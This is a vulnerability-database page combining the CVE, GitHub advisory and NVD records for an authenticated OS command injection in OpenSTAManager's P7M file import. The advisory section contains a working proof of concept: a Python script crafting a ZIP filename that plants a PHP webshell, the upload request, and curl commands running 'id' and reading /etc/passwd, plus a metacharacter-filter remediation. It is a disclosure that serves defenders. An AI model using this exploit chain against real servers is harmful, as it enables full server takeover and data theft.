CVE-2025-69212 (GCVE-0-2025-69212)
Vulnerability from cvelistv5 – Published: 2026-02-06 18:12 – Updated: 2026-02-06 18:12
VLAI?
Title
OpenSTAManager has an OS Command Injection in P7M File Processing
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
Severity ?
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| devcode-it | openstamanager |
Affected:
<= 2.9.8
|
{
"containers": {
"cna": {
"affected": [
{
"product": "openstamanager",
"vendor": "devcode-it",
"versions": [
{
"status": "affected",
"version": "\u003c= 2.9.8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"privilegesRequired": "LOW",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-06T18:12:38.391Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36"
}
],
"source": {
"advisory": "GHSA-25fp-8w8p-mx36",
"discovery": "UNKNOWN"
},
"title": "OpenSTAManager has an OS Command Injection in P7M File Processing"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-69212",
"datePublished": "2026-02-06T18:12:38.391Z",
"dateReserved": "2025-12-29T15:00:37.380Z",
"dateUpdated": "2026-02-06T18:12:38.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-69212\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-06T19:16:07.373\",\"lastModified\":\"2026-02-06T21:57:22.450\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.4,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36\",\"source\":\"security-advisories@github.com\"}]}}"
}
}
GHSA-25FP-8W8P-MX36
Vulnerability from github – Published: 2026-02-06 17:59 – Updated: 2026-02-06 22:11
VLAI?
Summary
OpenSTAManager has an OS Command Injection in P7M File Processing
Details
Summary
A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
Vulnerable Code
File: src/Util/XML.php:100
public static function decodeP7M($file)
{
$directory = pathinfo($file, PATHINFO_DIRNAME);
$content = file_get_contents($file);
$output_file = $directory.'/'.basename($file, '.p7m');
try {
if (function_exists('exec')) {
// VULNERABLE - No input sanitization!
exec('openssl smime -verify -noverify -in "'.$file.'" -inform DER -out "'.$output_file.'"', $output, $cmd);
The Problem:
- The $file parameter is passed directly into exec() without sanitization
- Although wrapped in double quotes, an attacker can escape them
- The filename comes from uploaded ZIP archives (user-controlled)
Attack Vector
Entry Points:
-
plugins/importFE_ZIP/actions.php:126 (when automatic import is enabled)
php foreach ($files_xml as $xml) { if (string_ends_with($xml, '.p7m')) { $file = XML::decodeP7M($directory.'/'.$xml); // $xml from ZIP! -
plugins/importFE/src/FatturaElettronica.php:56 (constructor)
php if (string_ends_with($name, '.p7m')) { $file = XML::decodeP7M($this->file); // $name from user input!
Attack Flow:
- Attacker creates ZIP with malicious filename
- Upload ZIP via importFE_ZIP plugin
- Application extracts ZIP and iterates files
- For
.p7mfiles,decodeP7M()is called - Malicious filename is injected into
exec()command - Arbitrary command executes as web server user
Proof of Concept
⚠️ IMPORTANT NOTE: PHP's ZipArchive::extractTo() splits filenames on / character. Payload must NOT contain / in commands. Use cd directory && command instead of absolute paths.
Step 1: Create Malicious ZIP
import zipfile
cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_filename = f'invoice.p7m";{cmd};echo ".p7m'
with zipfile.ZipFile('exploit.zip', 'w') as zf:
zf.writestr(malicious_filename, b"DUMMY_P7M_CONTENT")
Step 2: Upload ZIP
POST /actions.php HTTP/1.1
Host: localhost:8081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc
Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="blob1"; filename="exploit.zip"
Content-Type: application/zip
[ZIP CONTENT]
------WebKitFormBoundaryBKunENXxjEx5VrRc--
Content-Disposition: form-data; name="op"
save
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_module"
14
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id_plugin"
48
------WebKitFormBoundaryBKunENXxjEx5VrRc--
Step 3: Exploitation Result
Response (500 error is expected - XML parsing fails AFTER command execution):
HTTP/1.1 500 Internal Server Error
{"error":{"type":"Exception","message":"Start tag expected, '<' not found"}}
Verification - Webshell Created:
Step 4: Remote Code Execution
Webshell is publicly accessible without authentication:
$ curl "http://localhost:8081/files/SHELL.php?c=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ curl "http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd"
[Full /etc/passwd output]
Impact
- Remote Code Execution: Full server compromise
- Data Exfiltration: Access to all application data and database
- Privilege Escalation: Potential escalation if web server runs with elevated privileges
- Persistence: Install backdoors and maintain access
- Lateral Movement: Pivot to other systems on the network
Prerequisites
- Authenticated user with access to invoice import functionality
Remediation
Input Sanitization
public static function decodeP7M($file)
{
// Validate that file path doesn't contain shell metacharacters
if (preg_match('/[;&|`$(){}\\[\\]<>]/', $file)) {
throw new \Exception('Invalid file path');
}
// Better: use escapeshellarg()
$safe_file = escapeshellarg($file);
$safe_output = escapeshellarg($output_file);
exec("openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output", $output, $cmd);
}
or
Validate Filename Before Processing
// In the upload handler, validate filenames from ZIP
foreach ($files_xml as $xml) {
// Only allow alphanumeric, dots, dashes, underscores
if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
continue; // Skip invalid filenames
}
if (string_ends_with($xml, '.p7m')) {
$file = XML::decodeP7M($directory.'/'.$xml);
}
}
Credit
Discovered by: Łukasz Rybak
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "devcode-it/openstamanager"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "2.9.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69212"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-06T17:59:37Z",
"nvd_published_at": "2026-02-06T19:16:07Z",
"severity": "CRITICAL"
},
"details": "## Summary\nA critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.\n\n\n## Vulnerable Code\n**File:** `src/Util/XML.php:100`\n\n```php\npublic static function decodeP7M($file)\n{\n $directory = pathinfo($file, PATHINFO_DIRNAME);\n $content = file_get_contents($file);\n\n $output_file = $directory.\u0027/\u0027.basename($file, \u0027.p7m\u0027);\n\n try {\n if (function_exists(\u0027exec\u0027)) {\n // VULNERABLE - No input sanitization!\n exec(\u0027openssl smime -verify -noverify -in \"\u0027.$file.\u0027\" -inform DER -out \"\u0027.$output_file.\u0027\"\u0027, $output, $cmd);\n```\n\n**The Problem:**\n- The `$file` parameter is passed directly into `exec()` without sanitization\n- Although wrapped in double quotes, an attacker can escape them\n- The filename comes from uploaded ZIP archives (user-controlled)\n\n## Attack Vector\n\n### Entry Points:\n1. **plugins/importFE_ZIP/actions.php:126** (when automatic import is enabled)\n ```php\n foreach ($files_xml as $xml) {\n if (string_ends_with($xml, \u0027.p7m\u0027)) {\n $file = XML::decodeP7M($directory.\u0027/\u0027.$xml); // $xml from ZIP!\n ```\n\n2. **plugins/importFE/src/FatturaElettronica.php:56** (constructor)\n ```php\n if (string_ends_with($name, \u0027.p7m\u0027)) {\n $file = XML::decodeP7M($this-\u003efile); // $name from user input!\n ```\n\n### Attack Flow:\n1. Attacker creates ZIP with malicious filename\n2. Upload ZIP via importFE_ZIP plugin\n3. Application extracts ZIP and iterates files\n4. For `.p7m` files, `decodeP7M()` is called\n5. Malicious filename is injected into `exec()` command\n6. Arbitrary command executes as web server user\n\n## Proof of Concept\n\n**\u26a0\ufe0f IMPORTANT NOTE:** PHP\u0027s `ZipArchive::extractTo()` splits filenames on `/` character. Payload must NOT contain `/` in commands. Use `cd directory \u0026\u0026 command` instead of absolute paths.\n\n### Step 1: Create Malicious ZIP\n\n```python\nimport zipfile\n\ncmd = \"cd files \u0026\u0026 echo \u0027\u003c?php system($_GET[\\\"c\\\"]); ?\u003e\u0027 \u003e SHELL.php\"\nmalicious_filename = f\u0027invoice.p7m\";{cmd};echo \".p7m\u0027\n\nwith zipfile.ZipFile(\u0027exploit.zip\u0027, \u0027w\u0027) as zf:\n zf.writestr(malicious_filename, b\"DUMMY_P7M_CONTENT\")\n```\n\n### Step 2: Upload ZIP\n\n```http\nPOST /actions.php HTTP/1.1\nHost: localhost:8081\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc\nCookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b\n\n------WebKitFormBoundaryBKunENXxjEx5VrRc\nContent-Disposition: form-data; name=\"blob1\"; filename=\"exploit.zip\"\nContent-Type: application/zip\n\n[ZIP CONTENT]\n------WebKitFormBoundaryBKunENXxjEx5VrRc--\nContent-Disposition: form-data; name=\"op\"\n\nsave\n\n------WebKitFormBoundaryBKunENXxjEx5VrRc\nContent-Disposition: form-data; name=\"id_module\"\n\n14\n------WebKitFormBoundaryBKunENXxjEx5VrRc\nContent-Disposition: form-data; name=\"id_plugin\"\n\n48\n------WebKitFormBoundaryBKunENXxjEx5VrRc--\n```\n\u003cimg width=\"2539\" height=\"809\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f39cf6ad-9e8d-41de-866e-e01ec2064fd1\" /\u003e\n\n\u003cimg width=\"1543\" height=\"659\" alt=\"image\" src=\"https://github.com/user-attachments/assets/41fbd038-0bce-4b1c-bdc3-8ddcf3bf13be\" /\u003e\n\n### Step 3: Exploitation Result\n\n**Response (500 error is expected - XML parsing fails AFTER command execution):**\n```http\nHTTP/1.1 500 Internal Server Error\n{\"error\":{\"type\":\"Exception\",\"message\":\"Start tag expected, \u0027\u003c\u0027 not found\"}}\n```\n\n**Verification - Webshell Created:**\n\n\u003cimg width=\"1111\" height=\"239\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d2e36cf3-c438-4509-be46-36d5c6f3e0d1\" /\u003e\n\n### Step 4: Remote Code Execution\n\n**Webshell is publicly accessible without authentication:**\n\n```bash\n$ curl \"http://localhost:8081/files/SHELL.php?c=id\"\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n$ curl \"http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd\"\n[Full /etc/passwd output]\n```\n\u003cimg width=\"698\" height=\"475\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7ee4630b-95a8-450c-bdce-d6f703c8168d\" /\u003e\n\n\n## Impact\n\n- **Remote Code Execution:** Full server compromise\n- **Data Exfiltration:** Access to all application data and database\n- **Privilege Escalation:** Potential escalation if web server runs with elevated privileges\n- **Persistence:** Install backdoors and maintain access\n- **Lateral Movement:** Pivot to other systems on the network\n\n## Prerequisites\n\n- Authenticated user with access to invoice import functionality\n\n## Remediation\n\n### Input Sanitization\n\n```php\npublic static function decodeP7M($file)\n{\n // Validate that file path doesn\u0027t contain shell metacharacters\n if (preg_match(\u0027/[;\u0026|`$(){}\\\\[\\\\]\u003c\u003e]/\u0027, $file)) {\n throw new \\Exception(\u0027Invalid file path\u0027);\n }\n\n // Better: use escapeshellarg()\n $safe_file = escapeshellarg($file);\n $safe_output = escapeshellarg($output_file);\n\n exec(\"openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output\", $output, $cmd);\n}\n```\nor\n\n### Validate Filename Before Processing\n\n```php\n// In the upload handler, validate filenames from ZIP\nforeach ($files_xml as $xml) {\n // Only allow alphanumeric, dots, dashes, underscores\n if (!preg_match(\u0027/^[a-zA-Z0-9._-]+$/\u0027, $xml)) {\n continue; // Skip invalid filenames\n }\n\n if (string_ends_with($xml, \u0027.p7m\u0027)) {\n $file = XML::decodeP7M($directory.\u0027/\u0027.$xml);\n }\n}\n```\n\n\n## Credit\nDiscovered by: \u0141ukasz Rybak",
"id": "GHSA-25fp-8w8p-mx36",
"modified": "2026-02-06T22:11:47Z",
"published": "2026-02-06T17:59:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69212"
},
{
"type": "PACKAGE",
"url": "https://github.com/devcode-it/openstamanager"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "OpenSTAManager has an OS Command Injection in P7M File Processing"
}
FKIE_CVE-2025-69212
Vulnerability from fkie_nvd - Published: 2026-02-06 19:16 - Updated: 2026-02-06 21:57
Severity ?
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server."
}
],
"id": "CVE-2025-69212",
"lastModified": "2026-02-06T21:57:22.450",
"metrics": {
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-02-06T19:16:07.373",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-25fp-8w8p-mx36"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Undergoing Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…